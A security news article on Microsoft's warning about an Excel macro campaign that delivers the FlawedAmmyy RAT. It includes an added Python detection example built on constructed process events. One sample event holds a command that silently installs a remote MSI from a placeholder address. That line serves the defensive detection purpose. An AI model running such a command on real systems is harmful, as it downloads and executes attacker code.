The Microsoft Security Intelligence team has advised users to disable macros to avoid infection by a malware campaign that compromises fully patched Windows PCs through an Excel attachment whose malicious macro starts a multi-stage chain ending in the FlawedAmmyy remote access Trojan.
“Anomaly detection helped us uncover a new campaign that employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory,” the company warned, noting, “The attack starts with an email and .xls attachment with content in the Korean language.”
Once the .xls file is opened, it “automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive,” Microsoft said. A digitally signed executable in the MSI archive is extracted and run; it then “decrypts and runs another executable in memory.”
From there, that “executable downloads and decrypts another file, wsus.exe, which was also digitally signed on June 19,” Microsoft said. “wsus.exe decrypts and runs the final payload directly in memory,” the final payload being FlawedAmmyy.
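The chain above leaves two observable footprints before anything runs in memory: an Office process starting msiexec.exe with a remote package URL, and a later executable running from a user-writable path whose process tree leads back to Office. The following is an added example, not code from Microsoft or from the article, of detection logic that hunts for both. It assumes process-creation records shaped like Sysmon Event ID 1 (the field names ProcessId, ParentProcessId, Image, ParentImage and CommandLine); the sample events, the user name, the file names and the TEST-NET address 203.0.113.10 are constructed for this example, and the "trusted directory" heuristic is an assumption a deployment would tune.

```python
import re

# Office host processes that have no business launching an installer.
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Assumption: a binary with a Windows-sounding name (wsus.exe) is expected under these prefixes.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)


def _norm(path):
    return path.replace("/", "\\").lower()


def _base(path):
    return _norm(path).rsplit("\\", 1)[-1]


def lineage(events, pid):
    """Return image basenames from `pid` up to its oldest ancestor present in `events`."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_base(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain


def rule_office_spawns_remote_msiexec(ev, events):
    """Step 1 of the chain: an Office process starts msiexec.exe with an http(s) package URL."""
    return (_base(ev["ParentImage"]) in OFFICE_IMAGES
            and _base(ev["Image"]) == "msiexec.exe"
            and URL_RE.search(ev["CommandLine"]) is not None)


def rule_untrusted_binary_with_office_ancestor(ev, events):
    """Later step: an executable outside Windows/Program Files whose process tree leads back to Office."""
    if _norm(ev["Image"]).startswith(TRUSTED_PREFIXES):
        return False
    return any(anc in OFFICE_IMAGES for anc in lineage(events, ev["ProcessId"])[1:])


RULES = {
    "office_spawns_remote_msiexec": rule_office_spawns_remote_msiexec,
    "untrusted_binary_with_office_ancestor": rule_untrusted_binary_with_office_ancestor,
}


def detect(events):
    """Run every rule over every event; return sorted (rule_name, ProcessId) findings."""
    findings = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev, events):
                findings.append((name, ev["ProcessId"]))
    return sorted(findings)


# Constructed Sysmon-style process-creation records for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"ProcessId": 1200, "ParentProcessId": 800,
     "Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 4120, "ParentProcessId": 1200,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"EXCEL.EXE" "C:\Users\kim\Downloads\invoice.xls"'},
    {"ProcessId": 4388, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "msiexec.exe /i http://203.0.113.10/update.msi /q"},
    {"ProcessId": 4402, "ParentProcessId": 4388,
     "Image": r"C:\Users\kim\AppData\Local\Temp\wsus.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "wsus.exe"},
    # Benign control: a local install launched from Explorer with no URL on the command line.
    {"ProcessId": 5010, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i C:\installers\tool.msi"},
]

if __name__ == "__main__":
    for name, pid in detect(SAMPLE_EVENTS):
        print(f"{name}: pid {pid}, lineage {' <- '.join(lineage(SAMPLE_EVENTS, pid))}")
```

The second rule deliberately keys on ancestry rather than on the file name wsus.exe, because the name is chosen to blend in and will change between campaigns; the benign local msiexec.exe run in the sample is not flagged by either rule.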
“Excel macros have been associated with malware for a long time, but it’s still alarming for Microsoft to recommend disabling all macros – functions used routinely by millions of businesses,” said Satya Gupta, CTO and co-founder of Virsec. “Microsoft needs to rethink its macro strategy as it has become an easy vehicle for malware to get into fully patched systems.”
Noting that once attacks are in memory they’re mostly undetectable and leave few traces in the wake of an application’s execution, Gupta said, “Below the surface we also need a new approach to in-memory attacks that are being launched through these macros.”